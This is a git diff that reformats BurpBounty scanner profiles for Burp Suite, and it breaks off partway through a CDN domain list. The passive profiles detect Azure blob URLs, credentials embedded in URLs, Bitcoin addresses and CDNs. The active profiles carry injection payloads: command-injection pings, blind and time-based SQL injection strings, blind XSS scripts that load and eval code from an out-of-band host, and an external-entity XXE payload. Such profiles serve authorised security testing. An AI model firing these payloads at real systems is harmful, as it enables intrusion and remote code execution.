\\n\\/)]+.\\/"],"Tags":["All","Cloud"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Azure Blob Url detected","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Azure Blob Url detected","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Azure_Blob_Discovered", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,http(?:s):\\/\\/.[^\u003e\u003c\\\u0027\\\" \\n\\)]+.blob.core.windows.net\\/.[^\u003e\u003c\\\u0027\\\" \\n\\/)]+.\\/" + ], + "Tags": [ + "All", + "Cloud" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Azure Blob Url detected", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "Azure Blob Url detected", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Basic_Auth_Credentials.bb b/profiles/Basic_Auth_Credentials.bb old mode 100644 new mode 100755 index d990e86..f1749c7 --- a/profiles/Basic_Auth_Credentials.bb +++ b/profiles/Basic_Auth_Credentials.bb @@ -1 +1,59 @@ -[{"Name":"Basic_Auth_Credentials","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?\u003c\u003d:\\/\\/)[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\\.[a-zA-Z]+"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Basic Auth Credentials","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Basic_Auth_Credentials", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(?\u003c\u003d:\\/\\/)[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\\.[a-zA-Z]+" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Basic Auth Credentials", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Bitcoin_Address.bb b/profiles/Bitcoin_Address.bb old mode 100644 new mode 100755 index 5e70e1b..298577d --- a/profiles/Bitcoin_Address.bb +++ b/profiles/Bitcoin_Address.bb @@ -1 +1,59 @@ -[{"Name":"Bitcoin_Address","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Bitcoin Address","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Bitcoin_Address", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Bitcoin Address", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/BlindRCE.bb b/profiles/BlindRCE.bb old mode 100644 new mode 100755 index b68500e..406fb03 --- a/profiles/BlindRCE.bb +++ b/profiles/BlindRCE.bb @@ -1 +1,101 @@ -[{"Name":"BlindRCE","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":[" || ping -c 2 {BC}"," | ping -c 2 {BC}","; ping -c 2 {BC}"," \u0026\u0026 ping -c 2 {BC}"," \u0026 ping -c 2 {BC}"],"Encoder":[],"UrlEncode":true,"CharsToUrlEncode":"|;\u0026","Grep":[],"Tags":["Collaborator","RCE"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"BlindRCE","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"RCE with el payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "BlindRCE", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true, || ping -c 2 {BC}", + "true, | ping -c 2 {BC}", + "true,; ping -c 2 {BC}", + "true, \u0026\u0026 ping -c 2 {BC}", + "true, \u0026 ping -c 2 {BC}" + ], + "Encoder": [], + "UrlEncode": true, + "CharsToUrlEncode": "|;\u0026", + "Grep": [], + "Tags": [ + "Collaborator", + "RCE", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 4, + "MaxRedir": 0, + "payloadPosition": 2, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "BlindRCE", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "RCE with el payloads: \u003cbr\u003e \u003cpayload\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/BlindSQLi-ContentLength.bb b/profiles/BlindSQLi-ContentLength.bb old mode 100644 new mode 100755 index ffb220d..343a9f4 --- a/profiles/BlindSQLi-ContentLength.bb +++ b/profiles/BlindSQLi-ContentLength.bb @@ -1 +1,104 @@ -[{"Name":"BlindSQLi-ContentLength","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":[" or 1\u003d2"," or 1\u003d2-- "," or 1\u003d2#"," or 1\u003d2/*"," and 1\u003d2--"," and 1\u003d2"," and 1\u003d2#"," and 1\u003d2/*","\u0027 or \u00271\u0027\u003d\u00272","\u0027 and \u00271\u0027\u003d\u00272"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"3000","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":6,"RedirType":0,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"BlindSQLi-ContentLength","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Blind SQL injection found.","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] +[ + { + "ProfileName": "BlindSQLi-ContentLength", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true, or 1\u003d2", + "true, or 1\u003d2-- ", + "true, or 1\u003d2#", + "true, or 1\u003d2/*", + "true, and 1\u003d2--", + "true, and 1\u003d2", + "true, and 1\u003d2#", + "true, and 1\u003d2/*", + "true,\u0027 or \u00271\u0027\u003d\u00272", + "true,\u0027 and \u00271\u0027\u003d\u00272" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "3000", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 6, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 2, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "BlindSQLi-ContentLength", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "Blind SQL injection found.", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/BlindSQLi-TimeBased.bb b/profiles/BlindSQLi-TimeBased.bb index 9360ae9..256beb5 100755 --- a/profiles/BlindSQLi-TimeBased.bb +++ b/profiles/BlindSQLi-TimeBased.bb @@ -1 +1,107 @@ -[{"Name":"BlindSQLi-TimeBased","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u0027 and sleep 12--","\u0027 and sleep 12","\u0027 and sleep 12 and \u00271\u0027\u003d\u00271","\u0027 and sleep(12) and \u00271\u0027\u003d\u00271","\u0027 and sleep(12)--","\u0027 and sleep(12)",";sleep(12)--","\u0027 SELECT BENCHMARK(1200000,MD5(\u0027A\u0027));","\u0027 SELECT SLEEP(12); #","\u0027 WAITFOR DELAY \u00270:0:12\u0027--","\u0027 WAITFOR DELAY \u00270:0:12\u0027","\u0027 SELECT pg_sleep(12);"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["SQLi","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"10","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":5,"RedirType":0,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"BlindSQLi-TimeBased","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "BlindSQLi-TimeBased", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,\u0027 and sleep 12--", + "true,\u0027 and sleep 12", + "true,\u0027 and sleep 12 and \u00271\u0027\u003d\u00271", + "true,\u0027 and sleep(12) and \u00271\u0027\u003d\u00271", + "true,\u0027 and sleep(12)--", + "true,\u0027 and sleep(12)", + "true,;sleep(12)--", + "true,\u0027 SELECT BENCHMARK(1200000,MD5(\u0027A\u0027));", + "true,\u0027 SELECT SLEEP(12); #", + "true,\u0027 WAITFOR DELAY \u00270:0:12\u0027--", + "true,\u0027 WAITFOR DELAY \u00270:0:12\u0027", + "true,\u0027 SELECT pg_sleep(12);" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [], + "Tags": [ + "SQLi", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 5, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 2, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "BlindSQLi-TimeBased", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/BlindXSS.bb b/profiles/BlindXSS.bb index 3cad216..5f82027 100755 --- a/profiles/BlindXSS.bb +++ b/profiles/BlindXSS.bb @@ -1 +1,99 @@ -[{"Name":"BlindXSS","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003cscript\u003e$.getScript(\"//{BC}\")\u003c/script\u003e","\u003cscript\u003efunction b(){eval(this.responseText)};a\u003dnew XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"//{BC}\");a.send();\u003c/script\u003e","\"\u003e\u003cscript src\u003dhttp://{BC}\u003e\u003c/script\u003e","javascript:eval(\u0027var a\u003ddocument.createElement(\\\u0027script\\\u0027);a.src\u003d\\\u0027http://{BC}\\\u0027;document.body.appendChild(a)\u0027)"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["XSS","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":0,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"BlindXSS","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Blind XSS found with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "BlindXSS", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,\u003cscript\u003e$.getScript(\"//{BC}\")\u003c/script\u003e", + "true,\u003cscript\u003efunction b(){eval(this.responseText)};a\u003dnew XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"//{BC}\");a.send();\u003c/script\u003e", + "true,\"\u003e\u003cscript src\u003dhttp://{BC}\u003e\u003c/script\u003e", + "true,javascript:eval(\u0027var a\u003ddocument.createElement(\\\u0027script\\\u0027);a.src\u003d\\\u0027http://{BC}\\\u0027;document.body.appendChild(a)\u0027)" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [], + "Tags": [ + "XSS", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 0, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "BlindXSS", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "Blind XSS found with payloads: \u003cbr\u003e \u003cpayload\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/BlindXXE.bb b/profiles/BlindXXE.bb old mode 100644 new mode 100755 index 01a171a..982b984 --- a/profiles/BlindXXE.bb +++ b/profiles/BlindXXE.bb @@ -1 +1,96 @@ -[{"Name":"BlindXXE","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"http://{BC}\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["XXE"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":0,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"BlindXXE","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"BLIND XXE found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "BlindXXE", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"http://{BC}\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [], + "Tags": [ + "XXE", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 0, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "BlindXXE", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "BLIND XXE found", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/CDN_Detected.bb b/profiles/CDN_Detected.bb old mode 100644 new mode 100755 index 07d673d..694da05 --- a/profiles/CDN_Detected.bb +++ b/profiles/CDN_Detected.bb @@ -1 +1,127 @@ -[{"Name":"CDN_Detected","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,.clients.turbobytes.net","true,Or,.turbobytes-cdn.com","true,Or,.afxcdn.net","true,Or,.akamai.net","true,Or,.akamaiedge.net","true,Or,.akadns.net","true,Or,.akamaitechnologies.com","true,Or,.gslb.tbcache.com","true,Or,.cloudfront.net","true,Or,.anankecdn.com.br","true,Or,.att-dsa.net","true,Or,.azioncdn.net","true,Or,.belugacdn.com","true,Or,.bluehatnetwork.com","true,Or,.systemcdn.net","true,Or,.cachefly.net","true,Or,.cdn77.net","true,Or,.cdn77.org","true,Or,.panthercdn.com","true,Or,.cdngc.net","true,Or,.gccdn.net","true,Or,.gccdn.cn","true,Or,.cdnify.io","true,Or,.ccgslb.com","true,Or,.ccgslb.net","true,Or,.c3cache.net","true,Or,.chinacache.net","true,Or,.c3cdn.net","true,Or,.lxdns.com","true,Or,.speedcdns.com","true,Or,.mwcloudcdn.com","true,Or,.cloudflare.com","true,Or,.cloudflare.net","true,Or,.edgecastcdn.net","true,Or,.fastly.net","true,Or,.fastlylb.net","true,Or,.googlesyndication.com","true,Or,.googleusercontent.com","true,Or,.l.doubleclick.net","true,Or,.hiberniacdn.com","true,Or,.hwcdn.net","true,Or,.incapdns.net","true,Or,.inscname.net","true,Or,.insnw.net","true,Or,.internapcdn.net","true,Or,.kxcdn.com","true,Or,.lswcdn.net","true,Or,.footprint.net","true,Or,.llnwd.net","true,Or,.lldns.net","true,Or,.netdna-cdn.com","true,Or,.netdna-ssl.com","true,Or,.netdna.com","true,Or,.stackpathdns.com","true,Or,.mncdn.com","true,Or,.instacontent.net","true,Or,.mirror-image.net","true,Or,.cap-mii.net","true,Or,.rncdn1.com","true,Or,.simplecdn.net","true,Or,.swiftcdn1.com","true,Or,.swiftserve.com","true,Or,.gslb.taobao.com","true,Or,.cdn.bitgravity.com","true,Or,.cdn.telefonica.com","true,Or,.vo.msecnd.net","true,Or,.ay1.b.yahoo.com","true,Or,.yimg.com","true,Or,.zenedge.net"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"CDN Detected","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "CDN_Detected", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,.clients.turbobytes.net", + "true,Or,.turbobytes-cdn.com", + "true,Or,.afxcdn.net", + "true,Or,.akamai.net", + "true,Or,.akamaiedge.net", + "true,Or,.akadns.net", + "true,Or,.akamaitechnologies.com", + "true,Or,.gslb.tbcache.com", + "true,Or,.cloudfront.net", + "true,Or,.anankecdn.com.br", + "true,Or,.att-dsa.net", + "true,Or,.azioncdn.net", + "true,Or,.belugacdn.com", + "true,Or,.bluehatnetwork.com", + "true,Or,.systemcdn.net", + "true,Or,.cachefly.net", + "true,Or,.cdn77.net", + "true,Or,.cdn77.org", + "true,Or,.panthercdn.com", + "true,Or,.cdngc.net", + "true,Or,.gccdn.net", + "true,Or,.gccdn.cn", + 